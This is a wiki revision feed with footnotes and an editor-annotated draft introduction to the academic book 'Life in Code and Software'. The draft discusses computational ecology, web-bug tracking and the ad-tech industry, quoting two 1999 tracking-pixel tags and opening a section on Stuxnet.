[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4691</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4691"/>
		<updated>2012-04-18T12:16:43Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'this'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have a entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, certainly is keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the do not track header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although see the current debate over the EU ePrivacy Directive where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative direction of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims 'an eye on 1091622 websites': an Iranian web tracking and data analytics website which shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would &amp;quot;not be okay&amp;quot; with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be &amp;quot;okay&amp;quot; with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
